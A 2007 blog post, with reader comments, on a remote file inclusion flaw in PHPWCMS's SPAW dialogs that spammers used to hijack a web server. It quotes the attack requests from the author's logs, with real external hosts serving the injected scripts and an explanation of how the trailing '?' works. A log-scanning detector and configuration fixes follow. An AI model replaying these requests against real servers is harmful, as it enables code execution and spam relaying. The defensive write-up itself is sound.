How to avoid hacker attacks through PHPWCMS
Hello to everyone! After almost a month of inactivity I decided to write about this. My idea with this article is to show how to fix a big problem, not to talk badly about an open project.
Before beginning: PHPWCMS combined with other bad PHP configuration is a real back door. I do not think PHPWCMS itself is a back door, and I want to believe that if there is a bug in that project it was only a human error, not something intentional.
I may be writing about a bug that is already fixed, or not; I have not googled to find out.
A web server at a place where I work was being attacked by some “hackers” or “spammers” who used the server to send emails. You may think that sending some emails is not so bad, but imagine sending 6 MBps (48 Mbps) of emails... too much, no?
Watching the httpd access log I saw something interesting. The affected script contains this line:
include($spaw_root."/some/path");
That combination with register_globals = On is fatal. I don't know why the project ended up like this, because the line by itself is not an error; I think PHPWCMS does something similar to if ( !isset($spaw_root) ) $spaw_root = "default";
That means the attackers call the URL with a spaw_root GET parameter that contains a URL. If they request script_with_bug.php?spaw_root=http://www.php.net/index.php on our server, that URL is downloaded by PHP and parsed as PHP code, so whatever they publish there in plain text will be executed on our server.
You may think that the appended “/some/path” will stop that kind of attack. I am afraid not; you can do a simple test.
The result is the same, because in the second example index.php is a script, not a directory, so the request is still executed as far as index.php.
Watching the access log, I saw that the “hackers” did something like “GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=$URL”, where $URL is “http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/tester.txt?“. With that request, PHP downloaded the page http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/tester.txt as a text file and processed it as a PHP script.
Looking through the logs I saw pages like “http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/exp667.txt?”, ”http://hackangels.by.ru/good.txt?”, “http://trojanboy.by.ru/trojanboy.txt?” and several others. Most of those pages are for sending emails using the web server's bandwidth. That is big trouble, because our bandwidth is used up and our server will be marked as a spammer...
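To find requests of this kind in an access log, here is an added detection script (my own example, not code from the original post or from PHPWCMS). It parses Apache combined-format lines, splits the query string and flags any parameter whose value is a remote URL; the log lines are constructed samples and the hosts are placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not real traffic); example.invalid is a placeholder host.
# The trailing "?" on the injected URL turns the script's appended "/some/path" into a query
# string of the remote request, which is why the appended path does not stop the include.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Aug/2007:10:01:02 +0000] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://example.invalid/tester.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [29/Aug/2007:10:01:09 +0000] "GET /index.php?id=12 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Aug/2007:10:02:33 +0000] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://example.invalid/good.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.9 - - [29/Aug/2007:10:03:00 +0000] "GET /page.php?url=local/file HTTP/1.1" 200 100 "-" "curl"
"""

# Apache combined log: client ip, identd, user, [timestamp], "METHOD target PROTOCOL" ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# Schemes that allow_url_fopen lets include() fetch from another host.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")


def find_rfi_attempts(log_text):
    """Return one finding per request parameter whose value points at a remote URL."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line we understand; skip it
        parts = urlsplit(match.group("target"))
        # parse_qsl URL-decodes values, so percent-encoded "http%3A%2F%2F" is caught as well
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if value.lower().startswith(REMOTE_SCHEMES):
                findings.append({
                    "ip": match.group("ip"),
                    "time": match.group("ts"),
                    "script": parts.path,
                    "param": name,
                    "url": value,
                })
    return findings


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['script']} {hit['param']}={hit['url']}")
```

Run it against the real log with `find_rfi_attempts(open("/var/log/httpd/access_log").read())`; the client IPs it reports are the ones to block, and the scripts it names are the includes to audit.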
To avoid that kind of attack there are several ways: fix the code (the most expensive), migrate the site to another CMS (very expensive too), or tune the PHP configuration to block the attack.
What I did was open /etc/php.ini and change “allow_url_fopen = On” to Off. That denies including remote files; I think that setting should be Off by default.
Another good idea is to set “register_globals = Off”, and if the project needs register_globals On, we can use a simple function that only lets through the parameters we expect:
<?php
// whitelist of request parameters that are allowed to become global variables
$allow_params = array("foo", "foobar", "bar");
foreach ($_GET as $k => $v) {
    // in_array() with strict comparison: array_search() returns index 0 for "foo",
    // which is false-y and would wrongly reject the first allowed parameter
    if (in_array($k, $allow_params, true)) {
        // variable-variable assignment; no eval(), so the value is never parsed as code
        $$k = $v;
    }
}
// the same could be done for $_POST
?>
I hope this mini article helps to avoid attacks through PHP back doors and helps us write better software (free or not) every day.
Feel free to post a comment to ask something or to contribute.
August 29th, 2007 at 3:10 pm
Nice post Cesar!
It’s always worth raising awareness of the dangers of incorrectly set up PHP installs and of course the evils of register_globals.
PHP 5 is good for that - register_globals is off by default and of course it’s newer and vastly superior to PHP 4.
August 29th, 2007 at 3:27 pm
Maybe, Peter, but PHP5 is not as popular as PHP4, and I’ve used PHP4 for a very long time without any problem.
Of course I usually use PHP5 too.
Thanks for posting your comment.
August 29th, 2007 at 9:55 pm
This is interesting, thank you for the post. I learned a lot.
August 30th, 2007 at 1:42 am
How to avoid the site being hacked through PHPWCMS…
The PHPWCMS project has several back doors that make a web server vulnerable. This news item presents a real hacking case and how to avoid it…